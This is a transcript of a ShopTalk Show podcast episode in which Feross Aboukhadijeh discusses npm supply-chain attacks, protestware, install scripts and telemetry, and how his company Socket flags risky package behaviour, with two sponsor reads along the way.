524: Package Security with Feross Aboukhadijeh from Socket

July 18th 2022 Download MP3

Feross Aboukhadijeh talks with us about web security, what Socket aims to help with, how Socket compares to Depandabot or Sync, how they analyze all the data for Socket, and what things developers should be thinking about with regards to security in their apps.

Tags: nom packages Security

Guests

Feross Aboukhadijeh

Web · Social

Founder + CEO
of Socket Security, Stanford lecturer, Open source at
Web Torrent, and StandardJS.

Time Jump Links

01:40 Guest introduction
03:30 Is Socket for JavaScript only or other langauges as well?
07:05 Issues with open source
14:18 Sponsor: Reflect
15:47 What Socket can check for in packages
17:56 How do you get started with Socket?
22:49 How much should developers care about security?
30:09 Packages gathering telemetry
32:22 How does Socket compare to Dependabot or Sync?
34:28 Sponsor: Notion
36:43 Where does Socket live in my workflow?
41:01 Can I run npm without scripts that autorun?
42:49 What do you teach at Stanford?
51:24 What do you think of typed languages?
55:04 How do you analyze all the data?
56:52 What did you write Socket in?

Transcript

[Banjo music]

MANTRA: Just Build Websites!

Dave Rupert: Hey there, Shop-o-maniacs. You're listening to another episode of the ShopTalk Show, a podcast all about front-end Web design and development. I'm Dave Rupert and with me is Chris Coyier. Hey, Chris! How are you?

Chris Coyier: Yeah. It's so funny how often you say front-end development and, lately, we're really graying the lines - lately. You know?

Dave: We're messing it up quite a bit, but that's fine. Hey, we should just say full stack.

Chris: All things Web really.

Dave: Now.

Chris: Yeah.

Dave: Blah.

Chris: [Laughter] Now, now. We have a niche. We have a niche. I'll slip in something about CSS later to make sure it's up there.

We have a special guest on the show today, though. Very exciting. Barely needs an introduction at all. Kind of like Madonna or something. Largely goes by your first name, right? The man behind feross.org, it's Feross! How ya doin', sir?

00:01:09

Feross Aboukhadijeh: Hey, folks! Awesome to be here. Thanks for having me.

Chris: Yeah! Yeah, that's awesome. We've been trying to line this up for a while. I'm glad it worked out.

You do so much interesting stuff. Everything you do, it seems like, you put your whole brain into it and go big - it seems like. I mean just two seconds before the call, we were on Riverside, and you're like, "I thought about building this."

[Laughter]

Chris: Which is great. And then Dave was like, "What's the most obscure question I can think of?" And he throws a zinger at him. He's just like, "Oh, I have the perfect answer for that."

Feross: [Laughter]

Chris: Yes. [Laughter] We're 30 seconds into the show and galaxy brain is happening to us. Just amazing stuff here.

But there's one big thing that we'll talk about, which is generally the topic of Web security, because you have (dare I call it) a startup in this space called Socket. The URL is socket.dev. Why don't we just start there and tell us just the 30-second version of yourself and then ending with what the heck Socket is.

00:02:09

Feross: Sure. Yeah, so I'm an open-source maintainer. I've worked on a bunch of JavaScript packages over the years. Maybe folks have heard of Standard.js, which is a code style and code quality tool; and Web Torrent, which is the first library that made BitTorrent work in the Web browser; and a bunch of other stuff.

And yeah, I mean the Socket product and kind of what I'm trying to work on with Socket really comes down to how do you know if you can trust your open-source dependencies.

Chris: Mm-hmm.

Feross: Because while working on open-source, I kind of got a first-hand look at how the sausage is made, and the thing is modern applications use thousands of dependencies. I think Hello, World for React is up to like 1,400 dependencies now if you run Create React App.

Chris: Hmm!

Feross: It's pretty crazy, yeah, and so you're trusting thousands of dependencies written by hundreds of maintainers. And installing even one package can lead to these dozens of transitive dependencies coming along for the ride. It's just far too easy for a bad actor to infiltrate what they call the software supply chain (so this sort of idea of where your code comes from) and wreak havoc.

So, yeah, Socket is a platform to protect you from those types of attacks, and a lot of companies and different individuals are using it right now. And so, I'm happy to jump into more about how that works.

Chris: Yeah. I think we should because it's just interesting. We can always go backwards and forwards in time. There's no rules. This is just a podcast.

Are we specifically talking about NPM, or are you using the words "supply chain" and that type of thing generically because maybe someday you might do it for Python too or whatever? Or do you already? What's up with that?

00:03:51

Feross: Yeah. We want to do all the languages eventually. Right now, we're 100% JavaScript focused, so JavaScript is not only the biggest ecosystem, but it's also kind of the one that, like, we get all the problems first.

Chris: [Laughter]

Feross: When you're the biggest -- some people think it's just something about JavaScript. Why are there always these news stories about attacks in JavaScript and in NPM?

Chris: Right.

Feross: I don't think it's because JavaScript programmers are worse or anything like that. Some people probably would love to say that and say, "Oh, those JavaScript folks, they've forgotten how to program because they need to install a package when they could have written a three-line function. They'll go and install a package for it instead." I don't buy that.

I mean there's some element of that that's true, but-- [Laughter]

Dave: Yeah. On average, isn't that true because I actually told somebody to use Lodash this week. Like, "Just use Lodash. We don't need to write that." [Laughter]

Feross: Yeah. You know it's partly true. I think it's a few things. One is NPM was the first package manager to really solve dependency hell. So, if you go to Python or these older package managers and you install foo version 1, and then you install another dependency later on (and that dependency wants to use foo version 2), Python will just throw up its hands and say, "We don't know what to do because you're trying to use foo version 1 and something else in your project wants foo version 2, and we cannot install both foo version 1 and foo version 2. You're screwed." Right?

Whereas NPM said, "Wait a minute. Why don't we just install both of those versions and give foo version 1 to anything that wants foo version 1 and give food version 2 to anything that wants foo version 2?"

Chris: [Laughter] Is that better, though? I guess it kind of -- yeah, maybe it is better, but it leads to bigger packages, right? The front-end side of my soul says, "That's horrible," and the back-end says, "Ah, who cares?" You know?

Feross: Exactly. Exactly, yeah, and it sort of makes development easier. It means that when you type install, it'll never fail. It'll just work, and so it optimizes for that development experience being really nice.

The downside is, of course, like what you said. You'll end up with multiple versions, and it also creates this kind of psychological thing where now the cost of adding a dependency is super low.

Chris: Hmm.

Feross: If I as a maintainer know that I could just depend on this package and it's not going to cause any problems for my users, then I don't have to think twice about it. Whereas in Python, if you introduce a dependency on foo, you're thinking ten times about it because if that version is different than what another package needs then you just caused a ton of pain for your users. So, I think that's the big reason why NPM ended up with this culture of just a lot of dependencies.

Chris: Oh, I see. Users meaning not necessarily the users of your website; the users of your open-source package.

Feross: Exactly. Yeah, there's no cost for a maintainer of a package to add dependencies to it. I mean there's less cost because you're not going to create this dependency hell situation for the users of the package.

Chris: Right.

00:06:40

Feross: In some ways, too, it's good that we don't rewrite this code because copying and pasting code in from Stack Overflow into your project just to avoid a dependency, that has some downsides too that people don't like to talk about. I mean left pad is an example that folks like to really point to and say, "Oh, why can't people just write that? Have we forgotten how to program?" And that's true - somewhat.

Chris: That's true. All it did was put some - I don't know - white space or something on the side of a string. But what was the story to remind ourselves of what went wrong there? Was it a programmer who decided to delete that package? Is that how that went down?

00:07:16

Feross: The programmer there, I think he had a conflict with NPM in some way. He was upset that they took one of his package names of another one of his packages, and then he just decided to unpublish all his code, and that broke a bunch of people's builds. Then it actually led directly to NPM making unpublishing not possible in most circumstances.

Chris: Oh... So, it had a big fallout, so there are weaknesses to the supply chain. Even though it's perhaps better than whatever Python's version. There are still weaknesses in the chain, as it were.

Feross: Mm-hmm. Yeah, and more than just unpublishing packages. You guys probably saw the news about this but, back in January of this year, there was a maintainer who had a similar sort of moment where he decided to go rogue, and he added some pretty weird code into his packages that printed all kinds of weird conspiracy messages and added infinite loops -- while true. That kind of thing into the code.

Chris: Yeah.

Feross: Sort of just sabotaged his own code, and so that kind of thing can happen that isn't necessarily a security issue as much as just a quality issue. He decided to ruin his own code.

Chris: Yeah.

Feross: There have been cases of protestware, too. You've probably seen these where someone decided to--

Dave: Yeah.

Chris: I saw a blog post that you had about that that said that it was -- I think it looked like maybe an IP table or something and was like, "Was this from Russia?"

Feross: Mm-hmm.

Chris: "Then return false," or something - on something pretty big. And even you said styled components, which our front-end audience is probably familiar with. Didn't you say theirs was pretty benign? It just printed something to the console or something but, ultimately, still performed its function?

00:09:12

Feross: Yeah. So, there are various levels of badness here. On the most benign side of things with protestware, there are folks who are just printing out a console log at install time to sort of express their opinions. I think that's totally fine.

I think, on the opposite extreme, there was someone who published code that would delete your hard drive if you were to be coming from Russia.

Chris: Wow!

Feross: So, they would look at your IP address--

Chris: We should pause on that one for a minute. Yeah, yeah, first explain it, but I definitely have some questions there.

Feross: I don't know. It's one thing to kind of use your platform as a maintainer to protest and sort of use your voice to support things you believe in. And then it's another to sort of just kind of blindly destroy people's data and stuff. I personally think that one kind of crossed the line there.

It would look at your IP address, figure out where it thought you were coming from, and if it thought you were Russian, it would just start iterating through all the files on your hard drive and replacing the contents with a heart emoji, so you just lose all your files.

Chris: Wow! And it presumably -- did it happen to anybody? Did it happen to a lot of people? Was it real? [Laughter]

Feross: Mm-hmm. So, it was included in the package that had, I think, millions or tens of millions of downloads, and it was live for a few hours, so it definitely hit real people.

Chris: Wow! If it happened to me and my stock Mac Book here and whatever--

Dave: I think it was in the Nuxt CLI, I think it got hit by hit, so yeah.

Chris: Wow!

Feross: Mm-hmm.

Dave: Or the Vue CLI, maybe. Yeah.

Chris: So, there are always joke comics or something. What is it? RMRF - you know. Is that star or something? Is it as simple as that? Is that kind of command possible to run via an NPM script that literally just deletes your fricken' hard drive?

00:11:01

Feross: So, yeah. This particular package did it in a more complicated way because it didn't want to just RMRF it. It wanted to put heart emojis everywhere on your computer (for a reason).

Chris: Yeah.

Feross: But you can actually just add RMRF as an install script, and NPM will happily run that as a post-install step after the package is installed.

Chris: So, skipping to the end a little bit, will Socket look for that? Do I need--?

Feross: [Laughter]

Chris: Because NPM won't, right? Apparently, they don't care if RMRF just lives in a freakin' script, which blows my mind. I mean that's at the heart of the issue, right? That NPM--

There's some stuff on there that's just like a CSS file or something. Pretty benign. But some of it is executable code. It could be a fricken' binary. It could be whatever, right?

Not only does it come down to my computer, and I know that I can run it; there are also things called install scripts, right? So, if in the package.json one of the scripts in there happens to be named something like prepare or install or post-install or something, just by virtue of me typing NPM install, which we all do a million times a day -- I mean maybe not a day but you know it's the most common thing we do on NPM -- that code will literally execute with my administrator privileges, presumably, right?

Feross: Mm-hmm.

Chris: Isn't that mind-blowing a little bit?

Feross: Mm-hmm.

Chris: It seems like this is a problem, but it's almost amazing that it hasn't been an even bigger problem.

Feross: Yeah. No, I totally agree. I think, in some ways, it's a miracle. It's like how most people are actually good, like the fact that you can just take this code that you haven't even--

Chris: Apparently, we've proved it. Yeah. [Laughter]

Feross: Yeah. [Laughter] Yeah, I mean I think 99.9% -- some really high percentage -- of maintainers are publishing really good code that you can just blindly install and use and it mostly just works.

The problem comes in when you have an exception to the rule, and you have somebody abusing that trust that folks have in open source. They take over a package by hijacking it in some way. Maybe the maintainer used a weak password. Maybe they sent a few good pull requests and then, eventually, got added as a co-maintainer to the project, and then they go rogue at that point.

There are different ways it can happen, but it is, overall, pretty rare if you think about the number of NPM installs that we're running that this happens. But when it does happen, when a really popular package does get taken over, then it can wreak havoc. Right?

It's something that NPM cares about. To your point about NPM, it's something they care about fixing and they are trying to scan for malicious packages, but for whatever reason, their approach currently is a very reactive thing where they'll let a package get uploaded and then, after it's live, they have some kind of step that comes in and tries to see if it's malware and then will take it down. But during the time that it's live, it could have affected people.

Chris: I see.

Feross: And then whatever they're using is just not that sophisticated yet because it's sort of stuff gets by all the time (just based on the news headlines that you see). I would say that they care, but just that it's just not working very well right now.

Chris: Sure. They might have to buy you or something, right?

Feross: [Laughter] Yeah, maybe.

00:14:18

[Banjo music starts]

Chris: This episode of ShopTalk Show is brought to you in part by Reflect. That's reflect.run/shoptalk. Follow the link in the show notes.

Reflect is an automated no code testing tool that shaves countless hours off your end-to-end testing time from writing and maintaining tests to root causing to debugging errors. Creating tests is as simple as using your Web app, so visit your site within Reflect's simulated browser and perform the actions you want to test. Then Reflect auto-generates the selectors and does all the painstaking work of test creation and maintenance for you to do in minutes.

The features include visual validation, cross-browser testing (Safari, Chrome, Firefox, Edge), email, and SMS validation. Sign up through the referral link here and you get a two-week trial, and you get to claim a free T-shirt. Hey, why not? Reflect.run/shoptalk.

Really an amazing tool. You all know about end-to-end tests, right? You go to your website. Let's say it's a Trello-like website. That's kind of the demo they have on their homepage. You need to test this app. It's your job to make sure that you don't break this app, which is the point of tests.

Let's say you write a test that's like, "Okay. Go to this URL. Click the new card button. Enter this text." Maybe it has HTML in it or something. "Then click 'Add Card,'" and then the test can be like, "Was the card created? Does it have the right text in it? Did it go in the right place?" That's an end-to-end test. It's testing that your app works, essentially, across a whole mini workflow. Really useful stuff.

And then that test runs every time there's a PR and makes sure your app works forever, which is just worth its weight in gold. So, thanks so much for the support, Reflect.

[Banjo music stops]

00:16:13

Chris: All right, I think I saw -- maybe it was part of the marketing for Socket, .dev, or something, that was like, "Okay, there's been a new release of a package, and there's some kind of warning that comes up."

I don't know where you see it exactly. I'm sure you can explain. But it was like this dependency that you have, all of a sudden, it didn't have an install script before but now it does. And that should be a moment, as a maintainer, where you're like, "Whoa! I better look at that before I allow that into my code base." Do I have that right? Because that would be something that would be a concern, right? Perhaps it's some of this protestware.

Feross: Mm-hmm. Exactly. Yeah, that's what we realized.

When I was looking at all the attacks that have been happening, I kind of dug into the code and said, "Okay, what are the things that people do when they take over a package? What do the bad guys do?"

It was always -- it usually involved somehow stealing data, sending it to the network, so reading and writing variables, reading files, sending it to the network, or running shell commands. And so, we looked at just what are the signals here that we should be looking at that could indicate that a package has been taken over or has significantly changed its behavior in a way that is worrying. Right?

Chris: Mm-hmm.

Feross: And any time a package that you're using does one of those things, that's actually a really good sign that you should take a second look and really dig in and be able to answer the question, "Why does this package suddenly need to be able to do an install script or to run a shell command?"

Chris: Oh, so you know if it ran a bash shell script. If a package didn't run a shell script, and now it does run a shell script, that's a thing that Socket can detect? Maybe instead of just asking you the really specific questions, what does Socket do? [Laughter]

Feross: [Laughter] Yeah, yeah. Sure.

Dave: What would you say you do here?

[Laughter]

00:18:08

Feross: So, I take the packages from here, and I--

Dave: From the developers and give it to the customers.

[Laughter]

Chris: I deal with the goddam packages!

[Laughter]

Feross: Exactly. Yeah, that's a great movie. No, so what we do is we have a few things. So, the first -- probably the easiest way to get started with Socket is you could just go to socket.dev, and you can type in a package that you're curious about and then look at what Socket has found in that package.

So, we give you a couple of things. We'll give you scores for the package, so what's the quality of it, what's the security status of it, what's the maintenance. Does it have a license you can use? Just sort of high-level scores. It kind of looks like Lighthouse, to be honest, if you look at it. It kind of looks like zero to 100, Lighthouse style scores for each package.

Then it also gives you any alerts or any kind of high-importance issues that we found in the package. So, that'll be stuff like, "Hey, this package contains a giant obfuscated blob of code in it. Click here to see what it is." Right?

Or "Hey, this package has had a new maintainer added recently." Or "Hey, this package will send your data to the network. Click here to see the line of code where it's going to send a fetch request and talk to the network." Right?

At a quick glance, you can get a sense for what does this package do. If it's something like you're installing Express and Express talks to the network, well, that's not surprising. It's a Web server. Obviously, Express is going to need to talk to the network, right?

But if you're installing a component and it's a dropdown, a little dropdown input component or something, and you see that that is reading your environment variables and sending them to the network, and it has an install script, you're going to say, "What is going on here? This makes no sense." Right?

It gives you a sense of -- it's almost like when you install an app on your phone and it wants to access your contacts or look at your photos.

Chris: Yeah.

Feross: The app has to ask you first, right? It has to disclose. It can't just do it. That's kind of what we're trying to bring to NPM packages, so you can see, at a glance, this is what it's going to do, almost like a nutrition facts label you have on food. It will tell you this has this many calories, this much sugar, and it's up to you to decide is 300 calories good or bad. I mean it depends on what your goals are.

Maybe accessing the network is okay, but maybe it's not. And so, we want to just tell you sort of what it's doing without you needing to jump into the code and really evaluate every line of code.

Chris: That's great. Yeah, okay, so you can see this Lighthouse-type score. Pretty useful. Yeah, that's evaluating it at some particular stage of me caring. Maybe I'm adding a new package, so I would look at these nutrition facts to see if it's kind of worthy of doing that or what I should be worried about.

But probably more on a day-to-day level, I'm worried about the crap happening to my project. Just what happened one day. Ah!

Feross: Mm-hmm.

Chris: What's that like?

00:21:04

Feross: Yeah, so for that we have a GitHub app that you can install. So, if you go ahead and add our GitHub app, the Socket GitHub app to your repo, then we will automatically watch for new pull requests coming through. So, any time a new PR lands or a new PR is sent, Socket will look at what dependencies have been added in that pull request and what dependencies have been updated in that pull request.

Chris: Oh, there you go.

Feross: And then when we see that there is a difference in the behavior, we will leave a comment on that PR as well as we have a check, so we can put a red X on that PR and say that someone should take a closer look at this.

Chris: Nice. You could, if you wanted to, make it un-mergeable.

Feross: Mm-hmm. Exactly. Yeah, exactly. And you can use that to sort of--

I think of it as I don't think, in general, that we want to--

Our philosophy isn't to be an annoying security tool that blocks developers from getting their job done, although you can definitely configure it to be that way if you want. But I'm much more of the opinion that developers actually care. They care about this stuff. They want to do the right thing. But right now, it's just way too hard. It's too much work to read all the lines of code of your dependencies, so no one is doing it. But I think if people have a comment coming in and just giving them a little bit of extra information, that developers will actually do the right thing there.

If I see that an alert is coming through and it tells me that this package is doing something absolutely ridiculous, I'm not going to want to merge that. I'm not going to ignore that.

Chris: Hmm. Right.

Feross: It's not something that you necessarily need to block, is kind of my philosophy.

Dave: Does Socket -- or maybe you put some thought into this.

One issue I have is I'll NPM install, and it's like, "You have 72,000 vulnerabilities."

Feross: Mm-hmm.

Dave: "Auto-fix?" Auto-fix obviously breaks everything. Then I look into some of them, and a lot of it is, "Oh, Jest has a RegEx that's weird," or something. Jest never makes it to production. Is this something you consider? Does NPM kind of need to evolve in terms of just dependencies and dev dependencies? What's your thoughts on those kinds of issues and how you should think about them?

I think Dad Abramov famously was like, "Don't care." [Laughter]

Feross: [Laughter]

Dave: I don't know.

Feross: Yeah.

Dave: But--

00:23:48

Feross: So, that's totally valid, and I think part of the reason why developers get so much fatigue around security is because of those types of alerts.

Look. I care a lot about security. I teach a Web security class at Stanford. I literally am working on this security company, and I basically ignore the NPM audit results.

Chris: [Laughter]

Dave: Yeah.

Feross: What does that tell you, right?

Dave: Super valuable. I should--

[Laughter]

Dave: --always say yes. Yeah.

Feross: Yeah, I mean so I think we need to be careful when we're building security tools to really care a lot about the signal-to-noise ratio. I think NPM audit, while it was a good attempt, it's just sort of too noisy in its current form. And it's to the point where everybody is pretty much just shipping code to production that has dozens or hundreds of vulnerabilities, and they don't know whether that's a big deal or not. They really just don't know what to do about it, and so it just ends up being ignored.

Part of the problem here is that there are a lot of companies, there are a lot of big companies in this space, that try to basically find as many of these vulnerabilities as possible. There are all these incentives. The security researchers, they want to be able to claim that they found something, and they also have an incentive to inflate the significance of it and say it's critical or it's high when it's maybe low.

Chris: They sure do. [Laughter]

Feross: Yeah. There are also the companies wanting to say that they have a database of the most vulnerabilities possible so they can sell that to people, so that's all contributing to this inflation of these not important things that have to do with RegEx as being slow - or whatever - in a dev tool get inflated as a critical issue - or whatever.

Socket is trying to not have that problem because it's probably worth taking a second here just to distinguish because there are known vulnerabilities, which are--

Dave: Like CVEs or whatever. Yeah.

Feross: CVEs, vulnerabilities, those are usually accidents that are--

Chris: What's that? I mean I figure I'm a podcast host and I don't know, so maybe somebody in the audience doesn't know too. [Laughter]

00:25:51

Feross: It stands for common vulnerabilities and exposures, and it's a list of computer security bugs, basically. It's run by -- it's this database that's run by the government, by the U.S. government, and they basically--

It's like a central place to submit all the known security flaws in all software, so desktop apps, open-source libraries, everything.

Chris: Wow!

Feross: It all just goes into this big database.

Chris: Okay.

Feross: It's run by the government, and when you're a security researcher and you find a bug, your goal is to get a CVE issued for it and write up a report. Then you can say, "Oh, I found this many CVEs this year," and it's a useful database because then tools can download it and that's basically what NPM audit does is it just downloads this database and tells you when you have a package that's in that list, basically. Right?

Chris: Oh, wow! How did I not know that? That seems like a big deal. Okay. Whoops. Well--

Dave: But it's sort of like, too, if you're reporting a vulnerability, you do it the official way. It gets logged. Does a thing. I think there's sort of like -- yeah. I don't know. It's just interesting. It's sort of like we have reported this bug in an official capacity. It's not just like some guy thought this was bad. You know?

Feross: Exactly, yeah. So, I mean, that's all good. People should be scanning for CVEs in this way, to some extent. There are sometimes really bad ones, right? I think the tooling could be better at highlighting when ones are truly, truly critical versus just not a big deal because it's in a dev tool or something like that.

But Socket is more interested and more focused on supply chain attacks because, right now, there's really nothing out there that does a good job with catching those because if you're relying on this database of known issues that folks have submitted, security researchers have submitted reports to, that's not going to help catch when a package is hijacked and contains malware and no one has found it yet. Right?

You're going to run NPM install, and your computer is going to get owned. Then tomorrow, in the news, when someone catches it finally and there's a report written about it, you're going to be like, "Oh, crap. Did I install that?" Then you're going to--

Chris: Right.

Feross: It'll be too late at that point, basically.

00:28:15

Feross: So, the point of Socket is if you are building a security-critical app, if you're building anything that's in production and you have user data or even on your own computer that you're worried about infecting, you don't want to just be blindly NPM installing code without having even read it.

And so, you want to have some check, some basic evaluation that will tell you if this is a likely supply chain attack, and that's what Socket is trying to do, so it can catch those packages that you don't even want to--

Here's the thing. Known vulnerabilities, you can run those. You can install them on your computer today and nothing is going to happen. It just means that if a bad guy sends the right HTTP request, maybe that library will be vulnerable in some way. But with a supply chain attack, it's literally malware. You don't want to even run that once. You don't want to NPM install that even one time. There's nothing--

There's no way you can say, "Oh, we'll fix that next month," or whatever. No, you are going to have problems today if you install that. Right?

Chris: [Laughter]

Dave: Yeah, okay. Breaking it into two levels of severity, it's like the oops, that's vulnerable code, and then there's uh-oh, red siren.

Chris: Sirens blaring. Yeah.

Dave: Somebody is trying to attack me from my Node modules.

Chris: Interestingly, those bigger problems have less tooling to help you. There's some irony there or something.

Feross: Exactly, yeah. Exactly, so that's what we're trying to address. We think that if you look for this stuff, like network access and shell usage and the presence of weird, big blobs of code and this kind of thing, then that'll actually catch supply chain attacks and also just help people pick better packages because there's just a lot of weirdness going on in NPM (if you really poke around). [Laughter] It even goes beyond the security angle as well. It's kind of wild what you'll find if you click around Socket for a little bit. So, yeah.

00:30:09

Feross: There's even telemetry. Have you guys heard about this, like packages gathering telemetry and sending it to the maintainer?

Chris: Is telemetry just usage data, essentially?

Feross: Yeah. Yeah. There are some packages that will -- you can add to your package if you're a maintainer, and then it'll send your IP address and the name of your project and stuff like that to the maintainer to kind of figure out which companies. They want to figure out which companies are installing their code.

Dave: Actually, literally, there was a CVE, a depend-a-bot alert, you know, for this parse URL, which I looked. I was like, "Who is using parse URL in my app?"

Well, it's Nuxt, Nuxt telemetry, and then get URL parse. I was like, "Why does Nuxt need to know my get URL?" But I guess they do - or they're trying.

Chris: Wow. Weird.

Feross: For that one, Socket will catch that and tell you how to disable the telemetry. So, in the GitHub comment, when you add Nuxt for the first time.

Dave: Yeah.

Feross: Or when you do a scan to get the current state of your repo, we'll tell you, "You have telemetry in one dependency, and here is the environment variable you should set or the option you should pass when you initialize that to turn that off."

Chris: Well, that's cool.

Feross: Yeah.

Dave: Gees. Yeah.

Chris: Good software has a pretty strong opinion about what it does and what it doesn't do, and what yours doesn't do is, like, "Oh, some React plugin has a little XSS thing," or something. You just don't. Not Socket's job. We're in the bigger--

Feross: Mm-hmm.

Chris: Or do you report on all that little crap too? You just don't surface it as strongly.

00:31:57

Feross: Yeah. We do have that data and it does feed into the scores. We have a vulnerability score, but it's not what makes Socket different or unique, and we don't currently, like, we're not planning to go and just start spamming people with that information because we want the signal to be really, really high, so the stuff that we will leave a comment on (on your pull request) is all very high signal stuff that you're going to be really glad that you got notified about.

Chris: Good. That sounds good. Dave mentioned depend-a-bot, so that's a thing that is - I don't know - related, I guess, because it's like, "Oh, shoot. There's some update," and the reason that the package was updated is because it fixes some problem. That's pretty useful of GitHub to have done. But in that -- what is it, CRV--?

Dave: CVE.

Feross: [Laughter]

Chris: Is that based on that data? Probably?

Feross: Exactly. Yeah.

Chris: Yeah. Okay. And then not to make you forced to talk about potential competitors or anything, but it's only because I don't understand this all the way. There's a thing called snyk.io that claims to help with vulnerability stuff too that I don't fully understand despite having friends who have worked there in the past. Are you a direct competitor of that, or do they also just different somehow?

00:33:18

Feross: So, they're basically a competitor to depend-a-bot, and they just do the CVEs, so the known vulnerabilities.

Chris: Okay.

Feross: Here's the thing. The security industry, they're really obsessed with known vulnerabilities because it's easy because all the data is there. It's public in a big database, and it's not that hard to write a tool that looks at your package JSON and tells you, "Hey, you have this version that is in a list, so you should not use that anymore. You should update." That's what pretty much all this tooling does.

Chris: Right.

Feross: And they've done other things. They've made it -- you know they have different integrations with different tools and all this kind of stuff that people are paying -- that's what people are paying for.

But at the end of the day, it's pretty similar to depend-a-bot and it'll send you pull requests when you have a known vulnerability.

Dave: Yeah.

Feross: And that's pretty much what it does. It does not do the stuff that Socket does where we actually analyze the code.

What we do, we have to download every NPM package, and we have to run an analysis on it, and we have to figure out what it's doing. None of these other tools do that. They just tell you whether it has any issues in this database.

Chris: That's so cool.

00:34:27

[Banjo music starts]

Chris: This episode of ShopTalk Show is brought to you in part by Notion. Learn more and get started for free at notion.com/codepen. That's notion.com/codepen to help you take the first step towards an organized, happier team today. That again is notion.com/codepen. I know this is ShopTalk Show and not CodePen Radio, but that's the URL we got just to keep all them clicks all consolidated for this overall sponsorship.

Notion is the best. As you know, I have done videos about how we use Notion. We've talked about Notion a ton on CodePen Radio and ShopTalk Show. It's a phenomenal software product.

In my opinion, it really changed the game and kind of invented a new category of knowledge management app, which is kind of how I think of it. But it's an app that's really at the core of running any kind of business, but probably mostly software technology businesses because that's where my brain is at.

It helps you plan projects and have shared calendars and have shared meeting notes. What you can do with it is really open-ended in the best possible way. Everything you make it a database or documents, and it's all nested and has good permissions levels and stuff.

I know I'm speaking very abstractly here, but once you get into using it, you're going to find it very natural and comfortable to use, especially in a team setting. And it just really brings people together. I have no doubt that it's made us a better place to work. At the places, the businesses, I've incorporated Notion into there, it's like Notion is where the work happens a lot of times, and I really love that.

I also want to say one thing about how I appreciate how they get the details right at Notion as a company. For example, for a long time, anybody asked us, "Where is the API? Where is the API?" for years and years and years. Finally, they're like, "Here's the API," and it's super well done, and it's well documented. It has good default integrations. It's just a super well-done API to the point where people were just like, "Um... Thanks. That's perfect, actually. Great." You know?

And then they took a bunch of time to get even a little detail about how text is selected across blocks in the document editor. It just underwent this great improvement of how you can select text across them. It feels just like you're selecting text in a natural way that you'd expect in any text editor, which was different before because of the block nature of editing.

A little hard to describe, but if you don't notice it, well, that's what they wanted. They didn't want you to be like, "Ew... Why is text selection weird in here?" which it kind of used to be a little bit. And now it's just better, and I appreciate that we're going to spend time on that detail. Not on necessarily some big flashy thing, but just on getting the experience of using the app good.

Thanks for the support, Notion.

[Banjo music stops]

00:37:24

Dave: So then Socket, where does it sit in my workflow? It's on NPM install or is it on--? I know there's a GitHub integration, so is it just living in GitHub? Where does it fit into my workflow?

Feross: Right now it's just on GitHub, so it will watch your PRs. We're also working on--

Because you're making a good point here, which is -- or I think you're making this point, which is when you run NPM install, you want to protect your own computer too. You don't want to wait until it gets on GitHub for us to tell you that, hey, this dependency is actually doing something sketchy. So, we want to protect your local, like when you run NPM install as well.

This month and next month, we're working on this new thing that we're calling right now Safe NPM, which is going to be a thing you can use to intercept your NPM installs.

Chris: Hmm...

Feross: When you run NPM install, we can actually sort of give you kind of a report card almost of here's what this package is going to do. Do you want to proceed: yes, no?

It's just one extra little step in your NPM install workflow, and it'll help to catch stuff before it even affects your own computer, so you don't have to wait until the GitHub pull request is sent to catch that.

Dave: Nice.

Chris: Interesting. It made me think of why is it that we execute all this stuff kind at this root terminal level at all? Is that dumb? Is there a world in which we all containerize everything we do on NPM?

00:39:04

Feross: I don't know why docker hasn't taken off more. Maybe it's just too annoying to use or something. But yeah, it's crazy that you want to build a website, so you have to run NPM install. Then that package that you haven't read the code for is going to get the ability to read and write your entire hard drive.

Chris: [Laughter]

Feross: It can literally delete your whole photo library, for example, if it wanted to.

Dave: Love is trust.

Feross: [Laughter]

Chris: [Laughter]

Dave: If you love something, you give it access to your full hard drive. I think that's just basic science. [Laughter]

Chris: Well, I guess it works in your favor temporarily. This is risky business, so use Socket.

Feross: No, I mean I want to solve the problem. I'm not just trying to sell Socket here.

Chris: Yeah, I know. I know.

Dave: No, no, well, it's interesting, too, just the different places where you want. Like when I'm NPM installing, I kind of want to make sure I didn't do it bad. Then when I PR, I want to make sure I didn't do it bad. Then maybe even in deploy or something, what gets installed there isn't bad either.

But I'm just thinking about all the things we want to do there. It's like I want to lint my code locally. Then I want to lint it on PR, and then I want to lint it on build or run my tests or check accessibility or check performance. You want all these checkpoints to happen all the time. It's just an interesting world, I guess, we live in from a development standpoint. It's like you always want to be checking always everywhere at every single -- [laughter] -- at every single keystroke, you want to check.

Feross: Mm-hmm.

Chris: Yeah. It also makes me think, like, I don't know. Can I run a version of NPM that doesn't allow anybody to have any scripts that auto-run?

Feross: Yeah. Yeah, you can. Well, you can pass a flag when you run NPM install. I think it's --ignore lifecycle -- or something like that. Let me see here.

Chris: Nice. I should look at that. That one in particular bugs me.

Feross: Yeah, you can even make it the default. I think you can put it in your configuration for NPM, and then it'll never run install scripts.

Chris: Yeah. I wonder what that breaks.

Feross: It does break stuff.

Chris: I like using them, personally. We have ne in our repo that's like -- you know because the vibe of get is that you generally don't commit your build artifacts, right? We have a repo of icons, and these SVG icons, because our React project grabs and SVG icon and it turns it into a little JSX component thing. But we don't commit those because those are just built things. The SVG is the more authored code, in a way. So, everybody has this - I don't know - post install script or whatever that when you pull the repo, if there's any new SVGs, it builds them. Pretty useful, but that's our own code. You know? You don't get to do that.

00:42:19

Feross: Yeah. No, I think there is a library that I'm forgetting the name of now, but there's a way to basically have an allow list of packages that you want to give the permission to run install scripts to. But then by default, it doesn't run them. You can use that to kind of jerry-rig--

You can make it so that, yeah, you control what actually gets to run an install script.

Chris: That's cool. It's just to extend things a little bit. You mentioned that you teach Web security at Stanford, so you have some class of kids. Is that where you went, by the way? Are you an alum that's now teaching the same program that you went through?

Feross: Yeah. Yeah, so I did undergrad there and then, after working on open source pretty much full time since graduating, I wanted to go back to get my master's, and so I went back in 2018, and I was really interested in security, so I took all these cryptography classes and networking classes and just got really interested in going deep on security.

Then when I was there, I asked one of the professors who taught Web security, like, "Why don't you guys teach this anymore? That was my favorite class in undergrad," and they said that they're teaching cryptocurrency instead now instead of web security, [laughter] and so I was like, "Oh, well that seems -- I mean, okay. I guess that's cool, but can we also have a Web security class because that seems pretty important to me?"

And they said, "Well, if you teach it then we can add it back," and I said, "Okay. That sounds pretty fun," and so I went and updated the course, which hadn't been taught since 2011, and updated it for the modern Web because a lot has changed since 2011.

